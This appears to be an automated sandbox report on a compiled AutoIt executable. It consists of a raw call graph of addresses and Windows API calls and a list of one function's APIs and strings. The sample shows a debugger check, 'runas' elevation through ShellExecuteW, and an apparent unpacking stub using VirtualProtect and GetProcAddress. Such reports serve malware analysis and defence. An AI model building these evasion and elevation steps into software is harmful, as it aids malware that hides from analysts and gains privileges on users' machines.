99280->99284 99281->99255 99283 ea8d68 __cftoe2_l 58 API calls 99282->99283 99285 ead75a 99283->99285 99284->99255 99286 ea8ff6 __cftoe2_l 9 API calls 99285->99286 99286->99284 99287->99259 99288->99262 99290 eb1b90 __write_nolock 99289->99290 99291 ea09e2 GetLongPathNameW 99290->99291 99292 e87d2c 59 API calls 99291->99292 99293 e8741d 99292->99293 99294 e8716b 99293->99294 99295 e877c7 59 API calls 99294->99295 99296 e8717d 99295->99296 99297 e848ae 60 API calls 99296->99297 99298 e87188 99297->99298 99299 ebecae 99298->99299 99300 e87193 99298->99300 99305 ebecc8 99299->99305 99347 e87a68 61 API calls 99299->99347 99302 e83f84 59 API calls 99300->99302 99303 e8719f 99302->99303 99341 e834c2 99303->99341 99306 e871b2 Mailbox 99306->98235 99308 e84f3d 136 API calls 99307->99308 99309 e869ef 99308->99309 99310 ebe45a 99309->99310 99312 e84f3d 136 API calls 99309->99312 99311 ee97e5 122 API calls 99310->99311 99313 ebe46f 99311->99313 99314 e86a03 99312->99314 99315 ebe473 99313->99315 99316 ebe490 99313->99316 99314->99310 99317 e86a0b 99314->99317 99320 e84faa 84 API calls 99315->99320 99321 ea0ff6 Mailbox 59 API calls 99316->99321 99318 ebe47b 99317->99318 99319 e86a17 99317->99319 99455 ee4534 90 API calls _wprintf 99318->99455 99348 e86bec 99319->99348 99320->99318 99326 ebe4d5 Mailbox 99321->99326 99325 ebe489 99325->99316 99327 ebe689 99326->99327 99335 ebe69a 99326->99335 99338 e87f41 59 API calls 99326->99338 99441 e8766f 99326->99441 99449 e874bd 99326->99449 99456 edfc4d 59 API calls 2 library calls 99326->99456 99457 edfb6e 61 API calls 2 library calls 99326->99457 99458 ee7621 59 API calls Mailbox 99326->99458 99328 ea2f95 _free 58 API calls 99327->99328 99329 ebe691 99328->99329 99330 e84faa 84 API calls 99329->99330 99330->99335 99334 ea2f95 _free 58 API calls 99334->99335 99335->99334 99336 e84faa 84 API calls 99335->99336 99459 edfcb1 89 API calls 4 library calls 99335->99459 99336->99335 99338->99326 99342 e834f3 _memmove 99341->99342 99343 e834d4 99341->99343 99344 ea0ff6 Mailbox 59 API calls 99342->99344 99345 ea0ff6 Mailbox 59 API calls 99343->99345 99346 e8350a 99344->99346 99345->99342 99346->99306 99347->99299 99349 ebe847 99348->99349 99350 e86c15 99348->99350 99532 edfcb1 89 API calls 4 library calls 99349->99532 99465 e85906 60 API calls Mailbox 99350->99465 99353 e86c37 99466 e85956 67 API calls 99353->99466 99354 ebe85a 99533 edfcb1 89 API calls 4 library calls 99354->99533 99356 e86c4c 99356->99354 99357 e86c54 99356->99357 99359 e877c7 59 API calls 99357->99359 99361 e86c60 99359->99361 99360 ebe876 99363 e86cc1 99360->99363 99467 ea0b9b 60 API calls __write_nolock 99361->99467 99365 ebe889 99363->99365 99366 e86ccf 99363->99366 99364 e86c6c 99368 e877c7 59 API calls 99364->99368 99369 e85dcf CloseHandle 99365->99369 99367 e877c7 59 API calls 99366->99367 99371 e86cd8 99367->99371 99372 e86c78 99368->99372 99370 ebe895 99369->99370 99373 e84f3d 136 API calls 99370->99373 99374 e877c7 59 API calls 99371->99374 99375 e848ae 60 API calls 99372->99375 99376 ebe8b1 99373->99376 99377 e86ce1 99374->99377 99378 e86c86 99375->99378 99379 ebe8da 99376->99379 99382 ee97e5 122 API calls 99376->99382 99470 e846f9 99377->99470 99468 e859b0 ReadFile SetFilePointerEx 99378->99468 99534 edfcb1 89 API calls 4 library calls 99379->99534 99386 ebe8cd 99382->99386 99383 e86cf8 99387 e87c8e 59 API calls 99383->99387 99385 e86cb2 99469 e85c4e SetFilePointerEx SetFilePointerEx 99385->99469 99390 ebe8f6 99386->99390 99391 ebe8d5 99386->99391 99392 e86d09 SetCurrentDirectoryW 99387->99392 99388 ebe8f1 99420 e86e6c Mailbox 99388->99420 99394 e84faa 84 API calls 99390->99394 99393 e84faa 84 API calls 99391->99393 99397 e86d1c Mailbox 99392->99397 99393->99379 99395 ebe8fb 99394->99395 99396 ea0ff6 Mailbox 59 API calls 99395->99396 99403 ebe92f 99396->99403 99399 ea0ff6 Mailbox 59 API calls 99397->99399 99401 e86d2f 99399->99401 99400 e83bcd 99400->98102 99400->98125 99402 e8538e 59 API calls 99401->99402 99430 e86d3a Mailbox __NMSG_WRITE 99402->99430 99404 e8766f 59 API calls 99403->99404 99431 ebe978 Mailbox 99404->99431 99405 e86e47 99528 e85dcf 99405->99528 99408 ebeb69 99539 ee7581 59 API calls Mailbox 99408->99539 99409 e86e53 SetCurrentDirectoryW 99409->99420 99412 ebeb8b 99540 eef835 59 API calls 2 library calls 99412->99540 99415 ebeb98 99417 ea2f95 _free 58 API calls 99415->99417 99416 ebec02 99543 edfcb1 89 API calls 4 library calls 99416->99543 99417->99420 99460 e85934 99420->99460 99421 ebec1b 99421->99405 99422 e8766f 59 API calls 99422->99431 99424 ebebfa 99542 edfb07 59 API calls 4 library calls 99424->99542 99426 e87f41 59 API calls 99426->99430 99430->99405 99430->99416 99430->99424 99430->99426 99521 e859cd 67 API calls _wcscpy 99430->99521 99522 e870bd GetStringTypeW 99430->99522 99523 e8702c 60 API calls __wcsnicmp 99430->99523 99524 e8710a GetStringTypeW __NMSG_WRITE 99430->99524 99525 ea387d GetStringTypeW _iswctype 99430->99525 99526 e86a3c 165 API calls 3 library calls 99430->99526 99527 e87373 59 API calls Mailbox 99430->99527 99431->99408 99431->99422 99432 e87f41 59 API calls 99431->99432 99435 ebebbb 99431->99435 99535 edfc4d 59 API calls 2 library calls 99431->99535 99536 edfb6e 61 API calls 2 library calls 99431->99536 99537 ee7621 59 API calls Mailbox 99431->99537 99538 e87373 59 API calls Mailbox 99431->99538 99432->99431 99541 edfcb1 89 API calls 4 library calls 99435->99541 99438 ebebd4 99439 ea2f95 _free 58 API calls 99438->99439 99440 ebebe7 99439->99440 99440->99420 99442 e8770f 99441->99442 99443 e87682 _memmove 99441->99443 99445 ea0ff6 Mailbox 59 API calls 99442->99445 99444 ea0ff6 Mailbox 59 API calls 99443->99444 99447 e87689 99444->99447 99445->99443 99446 e876b2 99446->99326 99447->99446 99448 ea0ff6 Mailbox 59 API calls 99447->99448 99448->99446 99450 e874d0 99449->99450 99453 e8757e 99449->99453 99451 ea0ff6 Mailbox 59 API calls 99450->99451 99454 e87502 99450->99454 99451->99454 99452 ea0ff6 59 API calls Mailbox 99452->99454 99453->99326 99454->99452 99454->99453 99455->99325 99456->99326 99457->99326 99458->99326 99459->99335 99461 e85dcf CloseHandle 99460->99461 99462 e8593c Mailbox 99461->99462 99463 e85dcf CloseHandle 99462->99463 99464 e8594b 99463->99464 99464->99400 99465->99353 99466->99356 99467->99364 99468->99385 99469->99363 99471 e877c7 59 API calls 99470->99471 99472 e8470f 99471->99472 99473 e877c7 59 API calls 99472->99473 99474 e84717 99473->99474 99475 e877c7 59 API calls 99474->99475 99476 e8471f 99475->99476 99477 e877c7 59 API calls 99476->99477 99478 e84727 99477->99478 99479 ebd8fb 99478->99479 99480 e8475b 99478->99480 99481 e881a7 59 API calls 99479->99481 99482 e879ab 59 API calls 99480->99482 99483 ebd904 99481->99483 99484 e84769 99482->99484 99485 e87eec 59 API calls 99483->99485 99486 e87e8c 59 API calls 99484->99486 99488 e8479e 99485->99488 99487 e84773 99486->99487 99487->99488 99489 e879ab 59 API calls 99487->99489 99491 e847bd 99488->99491 99492 ebd924 99488->99492 99507 e847de 99488->99507 99493 e84794 99489->99493 99497 e87b52 59 API calls 99491->99497 99495 ebd9f4 99492->99495 99503 ebd9dd 99492->99503 99515 ebd95b 99492->99515 99496 e87e8c 59 API calls 99493->99496 99494 e847ef 99498 e84801 99494->99498 99500 e881a7 59 API calls 99494->99500 99499 e87d2c 59 API calls 99495->99499 99496->99488 99501 e847c7 99497->99501 99502 e881a7 59 API calls 99498->99502 99505 e84811 99498->99505 99516 ebd9b1 99499->99516 99500->99498 99506 e879ab 59 API calls 99501->99506 99501->99507 99502->99505 99503->99495 99511 ebd9c8 99503->99511 99504 e84818 99509 e881a7 59 API calls 99504->99509 99518 e8481f Mailbox 99504->99518 99505->99504 99508 e881a7 59 API calls 99505->99508 99506->99507 99544 e879ab 99507->99544 99508->99504 99509->99518 99510 e87b52 59 API calls 99510->99516 99514 e87d2c 59 API calls 99511->99514 99512 ebd9b9 99513 e87d2c 59 API calls 99512->99513 99513->99516 99514->99516 99515->99512 99519 ebd9a4 99515->99519 99516->99507 99516->99510 99557 e87a84 59 API calls 2 library calls 99516->99557 99518->99383 99520 e87d2c 59 API calls 99519->99520 99520->99516 99521->99430 99522->99430 99523->99430 99524->99430 99525->99430 99526->99430 99527->99430 99529 e85de8 99528->99529 99530 e85dd9 99528->99530 99529->99530 99531 e85ded CloseHandle 99529->99531 99530->99409 99531->99530 99532->99354 99533->99360 99534->99388 99535->99431 99536->99431 99537->99431 99538->99431 99539->99412 99540->99415 99541->99438 99542->99416 99543->99421 99545 e879ba 99544->99545 99546 e87a17 99544->99546 99545->99546 99548 e879c5 99545->99548 99547 e87e8c 59 API calls 99546->99547 99554 e879e8 _memmove 99547->99554 99549 e879e0 99548->99549 99550 ebef32 99548->99550 99558 e88087 59 API calls Mailbox 99549->99558 99551 e88189 59 API calls 99550->99551 99553 ebef3c 99551->99553 99555 ea0ff6 Mailbox 59 API calls 99553->99555 99554->99494 99556 ebef5c 99555->99556 99557->99516 99558->99554 99560 e87009 99559->99560 99561 e86ef5 99559->99561 99560->98241 99561->99560 99562 ea0ff6 Mailbox 59 API calls 99561->99562 99564 e86f1c 99562->99564 99563 ea0ff6 Mailbox 59 API calls 99565 e86f91 99563->99565 99564->99563 99565->99560 99568 e874bd 59 API calls 99565->99568 99569 e8766f 59 API calls 99565->99569 99572 e863a0 99565->99572 99597 ed6ac9 59 API calls Mailbox 99565->99597 99568->99565 99569->99565 99570->98244 99571->98246 99598 e87b76 99572->99598 99574 e865ca 99575 e8766f 59 API calls 99574->99575 99576 e865e4 Mailbox 99575->99576 99576->99565 99579 e87eec 59 API calls 99590 e863c5 99579->99590 99580 e8766f 59 API calls 99580->99590 99581 ebe41f 99607 edfdba 91 API calls 4 library calls 99581->99607 99585 ebe42d 99586 e8766f 59 API calls 99585->99586 99587 ebe443 99586->99587 99587->99576 99588 e868f9 _memmove 99608 edfdba 91 API calls 4 library calls 99588->99608 99589 ebe3bb 99591 e88189 59 API calls 99589->99591 99590->99574 99590->99579 99590->99580 99590->99581 99590->99588 99590->99589 99594 e87faf 59 API calls 99590->99594 99603 e860cc 60 API calls 99590->99603 99604 e85ea1 59 API calls Mailbox 99590->99604 99605 e85fd2 60 API calls 99590->99605 99606 e87a84 59 API calls 2 library calls 99590->99606 99592 ebe3c6 99591->99592 99596 ea0ff6 Mailbox 59 API calls 99592->99596 99595 e8659b CharUpperBuffW 99594->99595 99595->99590 99596->99588 99597->99565 99599 ea0ff6 Mailbox 59 API calls 99598->99599 99600 e87b9b 99599->99600 99601 e88189 59 API calls 99600->99601 99602 e87baa 99601->99602 99602->99590 99603->99590 99604->99590 99605->99590 99606->99590 99607->99585 99608->99576 99610 e830d2 LoadIconW 99609->99610 99612 e83107 99610->99612 99612->98261 99613->98260 99615 ebd638 99614->99615 99616 e84227 99614->99616 99615->99616 99617 ebd641 DestroyCursor 99615->99617 99616->98266 99640 ee3226 62 API calls _W_store_winword 99616->99640 99617->99616 99619 e84129 99618->99619 99639 e84200 Mailbox 99618->99639 99620 e87b76 59 API calls 99619->99620 99621 e84137 99620->99621 99622 ebd5dd LoadStringW 99621->99622 99623 e84144 99621->99623 99626 ebd5f7 99622->99626 99624 e87d2c 59 API calls 99623->99624 99639->98272 99640->98266 99642 e8e835 99641->99642 99643 ec3ed3 99642->99643 99644 e8e89f 99642->99644 99655 e8e8f9 99642->99655 99714 e8a000 99643->99714 99649 e877c7 59 API calls 99644->99649 99644->99655 99646 ec3ee8 99671 e8ead0 Mailbox 99646->99671 99737 eea0b5 89 API calls 4 library calls 99646->99737 99647 e877c7 59 API calls 99647->99655 99650 ec3f2e 99649->99650 99652 ea2f80 __cinit 67 API calls 99650->99652 99651 ea2f80 __cinit 67 API calls 99651->99655 99652->99655 99653 ec3f50 99653->98349 99654 e88620 69 API calls 99654->99671 99655->99647 99655->99651 99655->99653 99657 e8eaba 99655->99657 99655->99671 99657->99671 99738 eea0b5 89 API calls 4 library calls 99657->99738 99659 e8a000 331 API calls 99659->99671 99660 e8f2f5 99742 eea0b5 89 API calls 4 library calls 99660->99742 99663 ec424f 99663->98349 99664 e88ea0 59 API calls 99664->99671 99668 eea0b5 89 API calls 99668->99671 99670 e8ebd8 99670->98349 99671->99654 99671->99659 99671->99660 99671->99664 99671->99668 99671->99670 99713 e880d7 59 API calls 2 library calls 99671->99713 99739 ed7405 59 API calls 99671->99739 99740 efc8d7 331 API calls 99671->99740 99741 efb851 331 API calls Mailbox 99671->99741 99743 e89df0 59 API calls Mailbox 99671->99743 99744 ef96db 331 API calls Mailbox 99671->99744 99673 e8f61a 99672->99673 99674 e8f7b0 99672->99674 99675 ec4848 99673->99675 99676 e8f626 99673->99676 99677 e87f41 59 API calls 99674->99677 99845 efbf80 331 API calls Mailbox 99675->99845 99843 e8f3f0 331 API calls 2 library calls 99676->99843 99683 e8f6ec Mailbox 99677->99683 99680 ec4856 99684 e8f790 99680->99684 99846 eea0b5 89 API calls 4 library calls 99680->99846 99682 e8f65d 99682->99680 99682->99683 99682->99684 99688 e84faa 84 API calls 99683->99688 99751 ef474d 99683->99751 99760 eecde5 99683->99760 99840 ee3e73 99683->99840 99684->98349 99686 e8f743 99686->99684 99844 e89df0 59 API calls Mailbox 99686->99844 99688->99686 99691->98349 99692->98349 99693->98349 99694->98279 99695->98284 99696->98349 99697->98285 99698->98285 99699->98285 99700->98349 99701->98349 99702->98349 99703->98349 99704->98349 99705->98349 99706->98334 99707->98334 99708->98334 99709->98334 99710->98334 99711->98334 99712->98334 99713->99671 99715 e8a01f 99714->99715 99732 e8a04d Mailbox 99714->99732 99716 ea0ff6 Mailbox 59 API calls 99715->99716 99716->99732 99717 e8b5d5 99718 e881a7 59 API calls 99717->99718 99731 e8a1b7 99718->99731 99719 ed7405 59 API calls 99719->99732 99720 ea0ff6 59 API calls Mailbox 99720->99732 99721 e877c7 59 API calls 99721->99732 99724 e881a7 59 API calls 99724->99732 99726 ec047f 99747 eea0b5 89 API calls 4 library calls 99726->99747 99729 ec048e 99729->99646 99730 ea2f80 67 API calls __cinit 99730->99732 99731->99646 99732->99717 99732->99719 99732->99720 99732->99721 99732->99724 99732->99726 99732->99730 99732->99731 99733 ec0e00 99732->99733 99735 e8a6ba 99732->99735 99736 e8b5da 99732->99736 99745 e8ca20 331 API calls 2 library calls 99732->99745 99746 e8ba60 60 API calls Mailbox 99732->99746 99749 eea0b5 89 API calls 4 library calls 99733->99749 99748 eea0b5 89 API calls 4 library calls 99735->99748 99750 eea0b5 89 API calls 4 library calls 99736->99750 99737->99671 99738->99671 99739->99671 99740->99671 99741->99671 99742->99663 99743->99671 99744->99671 99745->99732 99746->99732 99747->99729 99748->99731 99749->99736 99750->99731 99752 e89997 84 API calls 99751->99752 99753 ef4787 99752->99753 99754 e863a0 94 API calls 99753->99754 99761 e877c7 59 API calls 99760->99761 99762 eece1a 99761->99762 99763 e877c7 59 API calls 99762->99763 99764 eece23 99763->99764 99968 ee4696 GetFileAttributesW 99840->99968 99843->99682 99844->99686 99845->99680 99846->99684 99969 ee3e7a 99968->99969 99970 ee46b1 FindFirstFileW 99968->99970 99969->99686 99970->99969 99971 ee46c6 FindClose 99970->99971 99971->99969 99972 f98070 99973 f98080 99972->99973 99974 f9819a LoadLibraryA 99973->99974 99978 f981df VirtualProtect VirtualProtect 99973->99978 99975 f981b1 99974->99975 99975->99973 99977 f981c3 GetProcAddress 99975->99977 99977->99975 99980 f981d9 ExitProcess 99977->99980 99979 f98244 99978->99979 99979->99979 99981 ec0226 99987 e8ade2 Mailbox 99981->99987 99983 ec0c86 99998 ed66f4 59 API calls Mailbox 99983->99998 99985 ec0c8f 99987->99983 99987->99985 99988 ec00e0 VariantClear 99987->99988 99989 e8b6c1 99987->99989 99992 efe237 99987->99992 99995 e89df0 59 API calls Mailbox 99987->99995 99996 ed7405 59 API calls 99987->99996 99988->99987 99997 eea0b5 89 API calls 4 library calls 99989->99997 99999 efcdf1 99992->99999 99994 efe247 99994->99987 99995->99987 99996->99987 99997->99983 99998->99985 100000 e89997 84 API calls 99999->100000 100001 efce2e 100000->100001 100024 efce75 Mailbox 100001->100024 100037 efdab9 100001->100037 100003 efd0cd 100004 efd242 100003->100004 100008 efd0db 100003->100008 100076 efdbdc 92 API calls Mailbox 100004->100076 100007 efd251 100007->100008 100010 efd25d 100007->100010 100050 efcc82 100008->100050 100009 e89997 84 API calls 100025 efcec6 Mailbox 100009->100025 100010->100024 100015 efd114 100065 ea0e48 100015->100065 100018 efd12e 100071 eea0b5 89 API calls 4 library calls 100018->100071 100019 efd147 100021 e8942e 59 API calls 100019->100021 100023 efd153 100021->100023 100022 efd139 GetCurrentProcess TerminateProcess 100022->100019 100026 e891b0 59 API calls 100023->100026 100024->99994 100025->100003 100025->100009 100025->100024 100069 eef835 59 API calls 2 library calls 100025->100069 100070 efd2f3 61 API calls 2 library calls 100025->100070 100027 efd169 100026->100027 100036 efd190 100027->100036 100072 e88ea0 59 API calls Mailbox 100027->100072 100029 efd17f 100073 efd95d 107 API calls _free 100029->100073 100030 efd2b8 100030->100024 100033 efd2cc FreeLibrary 100030->100033 100033->100024 100036->100030 100074 e88ea0 59 API calls Mailbox 100036->100074 100075 e89e9c 60 API calls Mailbox 100036->100075 100077 efd95d 107 API calls _free 100036->100077 100038 e87faf 59 API calls 100037->100038 100039 efdad4 CharLowerBuffW 100038->100039 100078 edf658 100039->100078 100043 e877c7 59 API calls 100044 efdb0d 100043->100044 100045 e879ab 59 API calls 100044->100045 100046 efdb24 100045->100046 100048 e87e8c 59 API calls 100046->100048 100047 efdb6c Mailbox 100047->100025 100049 efdb30 Mailbox 100048->100049 100049->100047 100085 efd2f3 61 API calls 2 library calls 100049->100085 100051 efcc9d 100050->100051 100055 efccf2 100050->100055 100052 ea0ff6 Mailbox 59 API calls 100051->100052 100053 efccbf 100052->100053 100054 ea0ff6 Mailbox 59 API calls 100053->100054 100053->100055 100054->100053 100056 efdd64 100055->100056 100057 efdf8d Mailbox 100056->100057 100064 efdd87 _strcat _wcscpy __NMSG_WRITE 100056->100064 100057->100015 100058 e89d46 59 API calls 100058->100064 100059 e89c9c 59 API calls 100059->100064 100060 e89cf8 59 API calls 100060->100064 100061 ea594c 58 API calls __crtLCMapStringA_stat 100061->100064 100062 e89997 84 API calls 100062->100064 100064->100057 100064->100058 100064->100059 100064->100060 100064->100061 100064->100062 100088 ee5b29 61 API calls 2 library calls 100064->100088 100066 ea0e5d 100065->100066 100067 ea0ef5 VirtualProtect 100066->100067 100068 ea0ec3 100066->100068 100067->100068 100068->100018 100068->100019 100069->100025 100070->100025 100071->100022 100072->100029 100073->100036 100074->100036 100075->100036 100076->100007 100077->100036 100080 edf683 __NMSG_WRITE 100078->100080 100079 edf6c2 100079->100043 100079->100049 100080->100079 100083 edf6b8 100080->100083 100084 edf769 100080->100084 100083->100079 100086 e87a24 61 API calls 100083->100086 100084->100079 100087 e87a24 61 API calls 100084->100087 100085->100047 100086->100083 100087->100084 100088->100064 100089 e83633 100090 e8366a 100089->100090 100091 e83688 100090->100091 100092 e836e7 100090->100092 100130 e836e5 100090->100130 100096 e8375d PostQuitMessage 100091->100096 100097 e83695 100091->100097 100094 e836ed 100092->100094 100095 ebd31c 100092->100095 100093 e836ca NtdllDefWindowProc_W 100099 e836d8 100093->100099 100100 e836f2 100094->100100 100101 e83715 SetTimer RegisterClipboardFormatW 100094->100101 100139 e911d0 10 API calls Mailbox 100095->100139 100096->100099 100102 ebd38f 100097->100102 100103 e836a0 100097->100103 100109 e836f9 KillTimer 100100->100109 100110 ebd2bf 100100->100110 100101->100099 100104 e8373e CreatePopupMenu 100101->100104 100143 ee2a16 71 API calls _memset 100102->100143 100105 e836a8 100103->100105 100106 e83767 100103->100106 100104->100099 100111 e836b3 100105->100111 100112 ebd374 100105->100112 100137 e84531 64 API calls _memset 100106->100137 100108 ebd343 100140 e911f3 331 API calls Mailbox 100108->100140 100134 e844cb Shell_NotifyIconW _memset 100109->100134 100116 ebd2f8 MoveWindow 100110->100116 100117 ebd2c4 100110->100117 100119 e8374b 100111->100119 100120 e836be 100111->100120 100112->100093 100142 ed817e 59 API calls Mailbox 100112->100142 100113 ebd3a1 100113->100093 100113->100099 100116->100099 100122 ebd2c8 100117->100122 100123 ebd2e7 SetFocus 100117->100123 100136 e845df 81 API calls _memset 100119->100136 100120->100093 100141 e844cb Shell_NotifyIconW _memset 100120->100141 100121 e8375b 100121->100099 100122->100120 100126 ebd2d1 100122->100126 100123->100099 100124 e8370c 100135 e83114 DeleteObject DestroyWindow Mailbox 100124->100135 100138 e911d0 10 API calls Mailbox 100126->100138 100130->100093 100132 ebd368 100133 e843db 68 API calls 100132->100133 100133->100130 100134->100124 100135->100099 100136->100121 100137->100121 100138->100099 100139->100108 100140->100120 100141->100132 100142->100130 100143->100113 100144 e81055 100149 e82649 100144->100149 100147 ea2f80 __cinit 67 API calls 100148 e81064 100147->100148 100150 e877c7 59 API calls 100149->100150 100151 e826b7 100150->100151 100156 e83582 100151->100156 100153 e82754 100154 e8105a 100153->100154 100159 e83416 59 API calls 2 library calls 100153->100159 100154->100147 100160 e835b0 100156->100160 100159->100153 100161 e835bd 100160->100161 100162 e835a1 100160->100162 100161->100162 100163 e835c4 RegOpenKeyExW 100161->100163 100162->100153 100163->100162 100164 e835de RegQueryValueExW 100163->100164 100165 e835ff 100164->100165 100166 e83614 RegCloseKey 100164->100166 100165->100166 100166->100162 100167 e81066 100172 e8f8cf 100167->100172 100169 e8106c 100170 ea2f80 __cinit 67 API calls 100169->100170 100171 e81076 100170->100171 100173 e8f8f0 100172->100173 100205 ea0143 100173->100205 100177 e8f937 100178 e877c7 59 API calls 100177->100178 100179 e8f941 100178->100179 100180 e877c7 59 API calls 100179->100180 100181 e8f94b 100180->100181 100182 e877c7 59 API calls 100181->100182 100183 e8f955 100182->100183 100184 e877c7 59 API calls 100183->100184 100185 e8f993 100184->100185 100186 e877c7 59 API calls 100185->100186 100187 e8fa5e 100186->100187 100215 e960e7 100187->100215 100191 e8fa90 100192 e877c7 59 API calls 100191->100192 100193 e8fa9a 100192->100193 100243 e9ffde 100193->100243 100195 e8fae1 100196 e8faf1 GetStdHandle 100195->100196 100197 e8fb3d 100196->100197 100198 ec49d5 100196->100198 100199 e8fb45 OleInitialize 100197->100199 100198->100197 100200 ec49de 100198->100200 100199->100169 100250 ee6dda 64 API calls Mailbox 100200->100250 100202 ec49e5 100251 ee74a9 CreateThread 100202->100251 100204 ec49f1 CloseHandle 100204->100199 100252 ea021c 100205->100252 100208 ea021c 59 API calls 100209 ea0185 100208->100209 100210 e877c7 59 API calls 100209->100210 100211 ea0191 100210->100211 100212 e87d2c 59 API calls 100211->100212 100213 e8f8f6 100212->100213 100214 ea03a2 6 API calls 100213->100214 100214->100177 100216 e877c7 59 API calls 100215->100216 100217 e960f7 100216->100217 100218 e877c7 59 API calls 100217->100218 100219 e960ff 100218->100219 100259 e95bfd 100219->100259 100222 e95bfd 59 API calls 100223 e9610f 100222->100223 100224 e877c7 59 API calls 100223->100224 100225 e9611a 100224->100225 100226 ea0ff6 Mailbox 59 API calls 100225->100226 100227 e8fa68 100226->100227 100228 e96259 100227->100228 100229 e96267 100228->100229 100230 e877c7 59 API calls 100229->100230 100231 e96272 100230->100231 100232 e877c7 59 API calls 100231->100232 100233 e9627d 100232->100233 100234 e877c7 59 API calls 100233->100234 100235 e96288 100234->100235 100236 e877c7 59 API calls 100235->100236 100237 e96293 100236->100237 100238 e95bfd 59 API calls 100237->100238 100239 e9629e 100238->100239 100240 ea0ff6 Mailbox 59 API calls 100239->100240 100241 e962a5 RegisterClipboardFormatW 100240->100241 100241->100191 100244 e9ffee 100243->100244 100245 ed5cc3 100243->100245 100246 ea0ff6 Mailbox 59 API calls 100244->100246 100262 ee9d71 60 API calls 100245->100262 100248 e9fff6 100246->100248 100248->100195 100249 ed5cce 100250->100202 100251->100204 100263 ee748f 65 API calls 100251->100263 100253 e877c7 59 API calls 100252->100253 100254 ea0227 100253->100254 100255 e877c7 59 API calls 100254->100255 100256 ea022f 100255->100256 100257 e877c7 59 API calls 100256->100257 100258 ea017b 100257->100258 100258->100208 100260 e877c7 59 API calls 100259->100260 100261 e95c05 100260->100261 100261->100222 100262->100249 100264 e81016 100269 e84ad2 100264->100269 100267 ea2f80 __cinit 67 API calls 100268 e81025 100267->100268 100270 ea0ff6 Mailbox 59 API calls 100269->100270 100271 e84ada 100270->100271 100273 e8101b 100271->100273 100276 e84a94 100271->100276 100273->100267 100277 e84a9d 100276->100277 100278 e84aaf 100276->100278 100279 ea2f80 __cinit 67 API calls 100277->100279 100280 e84afe 100278->100280 100279->100278 100281 e877c7 59 API calls 100280->100281 100282 e84b16 GetVersionExW 100281->100282 100283 e87d2c 59 API calls 100282->100283 100284 e84b59 100283->100284 100285 e87e8c 59 API calls 100284->100285 100290 e84b86 100284->100290 100286 e84b7a 100285->100286 100287 e87886 59 API calls 100286->100287 100287->100290 100288 e84bf1 GetCurrentProcess IsWow64Process 100289 e84c0a 100288->100289 100292 e84c89 GetSystemInfo 100289->100292 100293 e84c20 100289->100293 100290->100288 100291 ebdc8d 100290->100291 100294 e84c56 100292->100294 100304 e84c95 100293->100304 100294->100273 100297 e84c7d GetSystemInfo 100299 e84c47 100297->100299 100298 e84c32 100300 e84c95 2 API calls 100298->100300 100299->100294 100301 e84c4d FreeLibrary 100299->100301 100302 e84c3a GetNativeSystemInfo 100300->100302 100301->100294 100302->100299 100305 e84c2e 100304->100305 100306 e84c9e LoadLibraryA 100304->100306 100305->100297 100305->100298 100306->100305 100307 e84caf GetProcAddress 100306->100307 100307->100305

                                        Executed Functions

                                        Function 00E83B4C Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E83B7A
                                        • IsDebuggerPresent.KERNEL32 ref: 00E83B8C
                                        • GetFullPathNameW.KERNEL32(00007FFF,?,?,00F462F8,00F462E0,?,?), ref: 00E83BFD
                                          • Part of subcall function 00E87D2C: _memmove.LIBCMT ref: 00E87D66
                                          • Part of subcall function 00E90A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00E83C26,00F462F8,?,?,?), ref: 00E90ACE
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00E83C81
                                        • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00F393F0,00000010), ref: 00EBD4BC
                                        • SetCurrentDirectoryW.KERNEL32(?,00F462F8,?,?,?), ref: 00EBD4F4
                                        • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00F35D40,00F462F8,?,?,?), ref: 00EBD57A
                                        • ShellExecuteW.SHELL32(00000000,?,?), ref: 00EBD581
                                          • Part of subcall function 00E83A58: GetSysColorBrush.USER32(0000000F), ref: 00E83A62
                                          • Part of subcall function 00E83A58: LoadCursorW.USER32(00000000,00007F00), ref: 00E83A71
                                          • Part of subcall function 00E83A58: LoadIconW.USER32(00000063), ref: 00E83A88
                                          • Part of subcall function 00E83A58: LoadIconW.USER32(000000A4), ref: 00E83A9A
                                          • Part of subcall function 00E83A58: LoadIconW.USER32(000000A2), ref: 00E83AAC
                                          • Part of subcall function 00E83A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00E83AD2
                                          • Part of subcall function 00E83A58: RegisterClassExW.USER32(?), ref: 00E83B28
                                          • Part of subcall function 00E839E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00E83A15
                                          • Part of subcall function 00E839E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00E83A36
                                          • Part of subcall function 00E839E7: ShowWindow.USER32(00000000,?,?), ref: 00E83A4A
                                          • Part of subcall function 00E839E7: ShowWindow.USER32(00000000,?,?), ref: 00E83A53
                                          • Part of subcall function 00E843DB: _memset.LIBCMT ref: 00E84401
                                          • Part of subcall function 00E843DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00E844A6
                                        Strings
                                        • This is a third-party compiled AutoIt script., xrefs: 00EBD4B4
                                        • runas, xrefs: 00EBD575
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
